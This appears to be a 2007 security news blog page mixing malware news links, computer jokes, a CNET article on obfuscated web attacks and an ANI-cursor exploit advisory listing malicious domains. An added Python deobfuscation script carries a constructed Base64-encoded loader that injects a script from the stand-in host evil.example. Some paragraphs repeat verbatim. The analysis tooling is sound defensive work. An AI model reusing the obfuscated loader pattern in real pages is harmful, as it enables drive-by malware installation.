Sunday, April 29, 2007
AntiSpy VS AntiSpy - AntiSpyware market news
Article link: http://reviews.cnet.com/4520-3513_7-6729554-1.html
Thursday, April 26, 2007
Found alternative tools for Antivirus protection.
There are many alternative protection tools available to purchase or try for free.
Go ahead and try test-driving some of them.
They all claim to be non-signature Antivirus tools, but what happens when malware can bypass them?
o Signacert
o Robotgenius
o Cyberhawk
For home users, visit Cyberhawk.
Labels:
Alternative Antivirus,
Cyberhawk,
Robotgenius,
Signacert
Custom Packer! Article "Packers, Packers, Packers for sale!"
Has anyone noticed that some malware is packed with weird packers?
For detailed information visit the Websense link.
I wish I could obtain this packer... ;)
Tale of 2 ANI attacks
Check out the two very different continental ANI exploits from Websense.
A detailed explanation can be located here.
Also see the map provided by Google on the report.
New approaches to malware detection coming into view
The major AV vendors like Symantec, McAfee & TrendMicro are seeking new ways to detect malware and viruses.
Detailed article can be found here.
JOKE! If Operating Systems Ran The Airlines...
Different operating systems. Different styles. But what if the quirks and styles of the different operating systems were applied to AIRLINES? What if airlines ran things the way operating systems do? This humorous analogy, applying operating system philosophies as if they were airlines, is a long-standing much-circulated amusing story, and we'd credit the author if we knew who wrote it!
If Operating Systems Ran The Airlines...
UNIX Airways
Everyone brings one piece of the plane along when they come to the airport. They all go out on the runway and put the plane together piece by piece, arguing non-stop about what kind of plane they are supposed to be building.
Air DOS
Everybody pushes the airplane until it glides, then they jump on and let the plane coast until it hits the ground again. Then they push again, jump on again, and so on...
Mac Airlines
All the stewards, captains, baggage handlers, and ticket agents look and act exactly the same. Every time you ask questions about details, you are gently but firmly told that you don't need to know, don't want to know, and everything will be done for you without your ever having to know, so just shut up.
Windows Air
The terminal is pretty and colourful, with friendly stewards, easy baggage check and boarding, and a smooth take-off. After about 10 minutes in the air, the plane explodes with no warning whatsoever.
Windows NT Air
Just like Windows Air, but costs more, uses much bigger planes, and takes out all the other aircraft within a 40-mile radius when it explodes.
Windows XP Air
You turn up at the airport, which is under contract to only allow XP Air planes. All the aircraft are identical, brightly coloured and three times as big as they need to be. The signs are huge and all point the same way. Whichever way you go, someone pops up dressed in a cloak and pointed hat insisting you follow him. Your luggage and clothes are taken off you and replaced with an XP Air suit and suitcase identical to everyone around you as this is included in the exorbitant ticket cost. The aircraft will not take off until you have signed a contract. The inflight entertainment promised turns out to be the same Mickey Mouse cartoon repeated over and over again. You have to phone your travel agent before you can have a meal or drink. You are searched regularly throughout the flight. If you go to the toilet twice or more you get charged for a new ticket. No matter what destination you booked you will always end up crash landing at Whistler in Canada.
OSX Air
You enter a white terminal, and all you can see is a woman sitting in the corner behind a white desk, you walk up to get your ticket. She smiles and says "Welcome to OS X Air, please allow us to take your picture", at which point a camera in the wall you didn't notice before takes your picture. "Thank you, here is your ticket" You are handed a minimalistic ticket with your picture at the top, it already has all of your information. A door opens to your right and you walk through. You enter a wide open space with one seat in the middle, you sit, listen to music and watch movies until the end of the flight. You never see any of the other passengers. You land, get off, and you say to yourself "wow, that was really nice, but I feel like something was missing"
Windows Vista Airlines
You enter a good looking terminal with the largest planes you have ever seen. Every 10 feet a security officer appears and asks you if you are "sure" you want to continue walking to your plane and if you would like to cancel. Not sure what cancel would do, you continue walking and ask the agent at the desk why the planes are so big. After the security officer making sure you want to ask the question and you want to hear the answer, the agent replies that they are bigger because it makes customers feel better, but the planes are designed to fly twice as slow. Adding the size helped achieve the slow fly goal. Once on the plane, every passenger has to be asked individually by the flight attendants if they are sure they want to take this flight. Then it is company policy that the captain asks the passengers collectively the same thing. After answering yes to so many questions, you are punched in the face by some stranger who when he asked "Are you sure you want me to punch you in the face? Cancel or Allow?" you instinctively say "Allow". After takeoff, the pilots realize that the landing gear driver wasn't updated to work with the new plane. Therefore it is always stuck in the down position. This forces the plane to fly even slower, but the pilots are used to it and continue to fly the planes, hoping that soon the landing gear manufacturer will give out a landing gear driver update. You arrive at your destination wishing you had used your reward miles with XP airlines rather than trying out this new carrier. A close friend, after hearing your story, mentions that Linux Air is a much better alternative and helps.
Linux Air
Disgruntled employees of all the other OS airlines decide to start their own airline. They build the planes, ticket counters, and pave the runways themselves. They charge a small fee to cover the cost of printing the ticket, but you can also download and print the ticket yourself.
When you board the plane, you are given a seat, four bolts, a wrench and a copy of the seat-HOWTO.html. Once settled, the fully adjustable seat is very comfortable, the plane leaves and arrives on time without a single problem, the in-flight meal is wonderful. You try to tell customers of the other airlines about the great trip, but all they can say is, "You had to do what with the seat?"
JOKE! Micro$oft & Unix joke quotes
To err is human, but to really foul things up requires a computer.
Any sufficiently advanced bug is indistinguishable from a feature.
The UNIX philosophy basically involves giving you enough rope to hang yourself. And then a couple of feet more, just to be sure.
Those parts of the system that you can hit with a hammer (not advised) are called hardware; those program instructions that you can only curse at are called software.
The difference between Microsoft and Jurassic Park? In one, a mad businessman makes a lot of money with beasts that should be extinct. The other is a film.
The gates in my computer are AND, OR and NOT; they are not Bill.
Nobody will ever need more than 640k RAM! - Bill Gates, 1981
Windows 95 needs at least 8 MB RAM. - Bill Gates, 1996
Nobody will ever need Windows 95. - Logical conclusion
Those who can't write, write manuals.
You have moved the mouse. NT must be restarted for the changes to take effect.
A computer without any MS Windows is like a fish without a bicycle.
UNIX is user friendly. It's just selective about who its friends are.
If all else fails, read the documentation.
Unix, MS-DOS, and Windows NT (also known as the Good, the Bad, and the Ugly).
Those who don't understand Unix are doomed to reinvent it, poorly.
You may not understand what I'm installing, but that's not my job. I just need to click Next, Next, Finish here so I can walk to the next system and repeat the process.
Gates' Law: Every 18 months, the speed of software halves.
MCSE == Minesweeper Consultant / Solitaire Expert
Press any key to continue, or any other key to cancel.
The only place for 63,000 bugs is a rain forest.
Of course I use Microsoft. Setting up a stable unix network is no challenge ;p
If the ancients were right and to think is to exist, does Microsoft exist?
The BeOS takes the best features from the major operating systems. It's got the power and flexibility of Unix, the interface and ease of use of the MacOS, and Minesweeper from Windows.
Everyone has a photographic memory. Some don't have film.
A Law of Computer Programming: Make it possible for programmers to write in English and you will find that programmers cannot write in English.
Mosher's Law of Software Engineering: Don't worry if it doesn't work right. If everything did, you'd be out of a job.
Real programmers don't write in BASIC. Actually, no programmers write in BASIC after reaching puberty.
Premature optimization is the root of all evil.
Voodoo Programming: Things programmers do that they know shouldn't work but they try anyway, and which sometimes actually work, such as recompiling everything.
Eagleson's Law: Any code of your own that you haven't looked at for six or more months might as well have been written by someone else.
A programming language that is sort of like Pascal except more like assembly except that it isn't very much like either one, or anything else. It is either the best language available to the art today, or it isn't.
If the code and the comments disagree, then both are probably wrong.
/* Halley */(Halley's comment.)
Never attribute to malloc that which can be adequately explained by stupidity.
C is a language that combines all the elegance and power of assembly language with all the readability and maintainability of assembly language.
If it wasn't for C, we'll be using BASI, PASAL and OBOL
99 little bugs in the code, 99 bugs in the code, fix one bug, compile it again... 101 little bugs in the code...
#define QUESTION ((bb) || !(bb)) /* Shakespeare */
Give a man a computer program and you give him a headache, but teach him to program computers and you give him the power to create headaches for others for the rest of his life.
Bus error - driver executed.
Wednesday, April 25, 2007
0wning Vista from the boot
Read full article from here.
Federico Biancuzzi interviews Nitin and Vipin Kumar, authors of VBootkit, a rootkit that is able to load from Windows Vista boot-sectors. They discuss the "features" of their code, the support of the various versions of Vista, the possibility to place it inside the BIOS (it needs around 1500 bytes), and the chance to use it to bypass Vista's product activation or avoid DRM.
Microsoft's own detailed threats listing site!
Check out MS's threat listing. Wow, are they going to be a full Antivirus company?
http://www.microsoft.com/security/portal/
JOKE! Some social mathematics for you
ROMANCE MATHEMATICS
Smart man + smart woman = romance
Smart man + dumb woman = affair
Dumb man + smart woman = marriage
Dumb man + dumb woman = pregnancy
`````````````````````````````````````
OFFICE ARITHMETIC
Smart boss + smart employee = profit
Smart boss + dumb employee = production
Dumb boss + smart employee = promotion
Dumb boss + dumb employee = overtime
```````````````````````````````````````
SHOPPING MATH
A man will pay $2 for a $1 item he needs.
A woman will pay $1 for a $2 item that she doesn't need.
``````````````````````````````````````````````````
GENERAL EQUATIONS & STATISTICS
A woman worries about the future until she gets a husband.
A man never worries about the future until he gets a wife.
A successful man is one who makes more money than his wife can spend.
A successful woman is one who can find such a man.
````````````````````````````````````````````````
HAPPINESS
To be happy with a man, you must understand him a lot and love him a little.
To be happy with a woman, you must love her a lot and not try to understand her at all.
`````````````````````````````````````````````````````````````````````````````
LONGEVITY
Married men live longer than single men do, but married men are a lot more willing to die.
``````````````````````````````````````````````````````````````````````````````
PROPENSITY TO CHANGE
A woman marries a man expecting he will change, but he doesn't. A man marries a woman expecting that she won't change, and she does.
```````````````````````````````````````````````````````````````````````````````
DISCUSSION TECHNIQUE
A woman has the last word in any argument. Anything a man says after that is the beginning of a new argument.
````````````````````````````````````````````````````````````````````````````````
HOW TO STOP PEOPLE FROM BUGGING YOU ABOUT GETTING MARRIED
Old aunts used to come up to me at weddings, poking me in the ribs and cackling, telling me, "You're next." They stopped after I started doing the same thing to them at funerals.
Adware poses as ActiveX control
Article can be found here.
Security researchers have discovered samples of adware posing as ActiveX controls that allow voyeurs to watch online smut.
The ploy used by ImageAccesActiveXObject represents a new tactic in the battle to infect users' PCs, according to anti-virus firm Panda Software. The malware infects Windows PCs when users visit hacker-controlled websites posing as repositories of porn. When users visit these sites a window opens offering "erotic pictures". If the user agrees, another window informs that an ActiveX has to be installed. This control, however, is really the adware ImageAccesActiveXObject as demonstrated in a video produced by Panda on the threat.
“Before now we had seen adware disguised as codecs to see videos, but never as ActiveX controls for viewing pictures. This is another strategy for tricking users. They think they are giving their consent to the installation of a legitimate tool when really they are allowing adware to be installed”, explained Luis Corrons, technical director of PandaLabs.
Once installed, the adware takes users to a page - which is currently unavailable - hosting smutty pictures. Meanwhile, malicious code is surreptitiously loaded onto compromised PCs. Among the sample of malware loaded onto PCs is SpyLocked, adware warning users that their computer is infected, and detecting ImageAccesActiveXObject. The "scareware" posing as security software will not allow computers to be disinfected unless users register the product. ImageAccesActiveXObject also downloads the Securitytoolbar adware, which installs a toolbar and displays intrusive pop-up pages when users visit certain websites.
Webroot's disgraceful action
Check out the posted messages as well!
http://sunbeltblog.blogspot.com/2007/04/this-is-just-weird.html
Cybercrooks who rig Web sites to break into PCs are getting better at hiding their malicious code, a security expert says
Article can be found here.
VANCOUVER, B.C.--Cybercrooks who rig Web sites to break into PCs are getting better at hiding their malicious code, a security expert said Wednesday.
Increasingly the actual code, often JavaScript, used to attack PCs is hidden in Flash animations or scrambled so that anyone who examines the source of a page can't easily identify it, said Jose Nazario, a senior software engineer at Arbor Networks, in a presentation at the CanSecWest security confab here.
"Their obfuscation tools are primitive but effective," Nazario said. "They use obfuscation to avoid simple signatures," he said, referring to security techniques based on signatures to detect malicious Web sites. Signatures are fingerprints of known attacks.
Web attacks have become commonplace. Tens of thousands of Web sites attempt to install malicious code, according to StopBadware.org. The sites, the bulk of which are compromised sites, often drop a Trojan horse or other pest onto a PC through a security hole in the Web browser.
Many attacks use JavaScript. Initially miscreants used plain JavaScript in their attacks, but that has changed, Nazario said. He has spotted an encoded script function called "makemelaugh" that downloads a Trojan horse that captures bank information and a Paris Hilton Flash animation that installs a tool that makes a PC part of a botnet.
Attackers also are trying to outsmart security pros by programming malicious sites to load their malicious code only once on the same PC, Nazario said. Furthermore, a new toolkit called NeoSploit identifies the browser and is packed with security exploits to launch the proper attack, he said.
There are things security professionals can do to investigate attacks, Nazario said. "Bad guys are limited by the fact that JavaScript has to be decoded to be used by the browser. As long as you can analyze it outside the browser, you can figure out what it is going to do," he said.
The scrambled code can be made legible since it typically uses simple Base64 encoding for obfuscation and not actual encryption, Nazario said. He suggested NJS, SpiderMonkey and Rhino as tools to investigate script code. Flash files can be analyzed using a program called Flasm, he said.
Malicious JavaScript can be embedded in a Web page and will typically run without warning when the page is viewed in any ordinary browser. Attackers could try to lure you to their own, rigged Web site. But an attack could also lurk on a trusted Web site by exploiting a common flaw known as cross-site scripting.
To shield against malicious JavaScript, Web surfers can disable JavaScript, but that can impact the functionality of many Web sites. An alternative is to use security tools that have blacklists of known bad sites such as McAfee's SiteAdvisor or Google's Toolbar or Desktop software.
Another alternative is Exploit Prevention Labs' LinkScanner, which monitors traffic going into a PC and blocks known exploits.
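Nazario's point above is that the obfuscation usually stops at Base64 and hex escapes, so an analyst can peel it off without ever letting a browser run the script. The following is an added example of that static approach, written for this page rather than taken from the article, Arbor Networks, or any of the tools Nazario names; the obfuscated script it works on is constructed (the `evil.example` host and `x.js` path are placeholders, not a real indicator), and it uses plain Python rather than NJS, SpiderMonkey or Rhino. It decodes the layers, lists the calls that hand control to decoded text, and pulls out the URLs the final layer would have loaded.

```python
import base64
import binascii
import re

# Constructed sample (not a real payload): an inner document.write() call whose
# angle brackets are hex-escaped so "<script" never appears literally, wrapped
# in a Base64 blob that the outer script decodes and eval()s at page-load time.
INNER_JS = r'document.write("\x3Cscript src=\"http://evil.example/x.js\"\x3E\x3C/script\x3E");'
SAMPLE_JS = 'var p="' + base64.b64encode(INNER_JS.encode()).decode() + '";eval(atob(p));'

# Calls that hand control to decoded or dynamically built text; their presence
# is a cue that the visible source is not the code the browser will actually run.
SUSPICIOUS = ["eval", "unescape", "atob", "String.fromCharCode", "document.write"]

HEX_ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{2})|\\u([0-9A-Fa-f]{4})")
B64_CANDIDATE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
URL = re.compile(r"""https?://[^\s"'<>\\)]+""")


def unescape_hex(text):
    """Resolve \\xHH and \\uHHHH escapes without evaluating anything."""
    return HEX_ESCAPE.sub(
        lambda m: chr(int(m.group(1) or m.group(2), 16)), text)


def _as_text(data):
    """Return the bytes as a string only if they are printable text."""
    try:
        s = data.decode("utf-8")
    except UnicodeDecodeError:
        return None
    if s and all(c.isprintable() or c in "\r\n\t" for c in s):
        return s
    return None


def find_base64_blobs(text):
    """Decode every Base64 run that yields printable text. Long identifiers that
    merely look Base64-ish fail validation or decode to binary junk and are dropped."""
    found = []
    for cand in B64_CANDIDATE.findall(text):
        try:
            raw = base64.b64decode(cand, validate=True)
        except (binascii.Error, ValueError):
            continue
        s = _as_text(raw)
        if s is not None:
            found.append(s)
    return found


def deobfuscate(js, max_rounds=5):
    """Peel layers statically: each round resolves hex escapes, then decodes any
    Base64 blobs. Returns every layer seen, outermost first, so the last entry is
    the readable code the browser would have executed."""
    layers = [js]
    current = js
    for _ in range(max_rounds):
        unescaped = unescape_hex(current)
        decoded = find_base64_blobs(unescaped)
        if decoded:
            nxt = "\n".join(decoded)
        elif unescaped != current:
            nxt = unescaped
        else:
            break  # nothing left to peel
        layers.append(nxt)
        current = nxt
    return layers


def suspicious_calls(text):
    """Names from SUSPICIOUS that are invoked in this layer, sorted."""
    return sorted(name for name in SUSPICIOUS if name + "(" in text)


def extract_urls(text):
    """URLs a layer references; on the final layer these are what would be fetched."""
    return URL.findall(text)


if __name__ == "__main__":
    for i, layer in enumerate(deobfuscate(SAMPLE_JS)):
        print(f"--- layer {i}: calls={suspicious_calls(layer)} urls={extract_urls(layer)}")
        print(layer)
```

Two caveats follow from the article itself. Because these sites serve the malicious code only once to a given PC, the page source has to be captured on first contact (a proxy log or a saved copy), since a second visit from the same address may return a clean page. And when a script uses more than simple encoding, such as building code with `String.fromCharCode` or keying the decode on browser state, the static pass above will stall at that layer; that is the point at which running it under SpiderMonkey or Rhino with `eval` and `document.write` replaced by logging stubs, as Nazario suggests, becomes the next step.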
Malicious JavaScript can be embedded in a Web page and will typically run without warning when the page is viewed in any ordinary browser. Attackers could try to lure you to their own, rigged Web site. But an attack could also lurk on a trusted Web site by exploiting a common flaw known as cross-site scripting.
To shield against malicious JavaScript, Web surfers can disable JavaScript, but that can impact the functionality of many Web sites. An alternative is to use security tools that have blacklists of known bad sites such as McAfee's SiteAdvisor or Google's Toolbar or Desktop software.
Another alternative is Exploit Prevention Labs' LinkScanner, which monitors traffic going into a PC and blocks known exploits.
Check out the TrendMicro answer to McAfee's SiteAdvisor
TrendMicro is following in the footsteps of McAfee's popular SiteAdvisor.
Want to see their newest tool "TrendProtect"?
Here: Link
Wednesday, April 11, 2007
Future Soldier - Robocop look-alike bodysuit
Check out the cool Future Warrior bodysuit; it looks just like something out of the Robocop movie.
Battlefield 2025 style
Direct link: http://soldiermagazine.co.uk/mag/feature1.htm
* Super-strength soldiers
* Water-tight design
* Head start on the enemy
* Bullet-proof bootnecks
* Robo-Rangers
Monday, April 2, 2007
New threat - Windows ANI exploit
CNET's security site is reporting the Windows animated cursor exploit.
Direct link: http://reviews.cnet.com/4520-6600_7-6722377-1.html
If you happen to have received spam emails with free Windows animated cursors attached, do NOT install them, and run Windows Update to obtain the security patch from Microsoft.
Microsoft security patch for the animated cursor vulnerability. Download link: here
From Cnet Security Center:-
Windows animated cursor attack
The way Microsoft Windows handles animated cursors on Web sites puts PCs at risk.
By Robert Vamosi (March 30, 2007) (revised 4/2/07)
QUICK FACTS
Name: Windows animated cursor attack
Date first reported: 03/29/07
CVE Number: CVE-2007-0038
Vulnerable software: Microsoft Windows 2000, SP1 through Windows Vista.
What it does: Causes a denial of service (persistent reboot) or could allow remote access.
Recommendations: Use an Internet browser other than Microsoft Internet Explorer, such as Firefox or Opera.
Exploit code available: Yes
Vendor patch available: Expected April 3, 2007.
Internet threat rating: 8 out of 10
There's a new Microsoft Windows vulnerability being exploited across the Internet on over 100 Web sites, according to security vendor Websense. The vulnerability is caused by an unspecified error in the way Windows 2000, XP, and Vista handle animated cursors. Animated cursors allow a mouse pointer to appear animated on a Web site. The feature is often designated by the .ani suffix, but attacks for this vulnerability are not constrained by this file type, so simply blocking .ani files won't necessarily protect a PC. Users need not do anything but visit a compromised site to become infected. Antivirus vendor F-Secure reports there's also a worm associated with this vulnerability.
Successful exploitation can result in memory corruption when processing cursors, animated cursors, and icons. According to Arbor Networks, the malicious code on compromised Web sites exploiting this flaw appears to be originating from the following sites, which you may want to block:
wsfgfdgrtyhgfd.net
85.255.113.4
uniq-soft.com
fdghewrtewrtyrew.biz
newasp.com.cn
To become infected, users must be using Internet Explorer 6 or 7; there is no need to click, as just visiting an infected site is enough. The flaw does not affect the Firefox or Opera browsers. Microsoft will release a patch on April 3, 2007. Until the patch is released, users should browse the Internet using a non-Internet Explorer browser. There is also a third-party (non-Microsoft) patch available here from the Zeroday Emergency Response Team (ZERT); however, this patch is offered "as is" and will need to be manually removed when Microsoft issues the official patch tomorrow.
Additional Resources
Microsoft: Advisory 935423
Zeroday Emergency Response Team (ZERT): Unofficial patch
NIST: CVE-2007-0038
Arbor Networks: Any Ani file could infect you
Websense: Alert
F-Secure: Blog post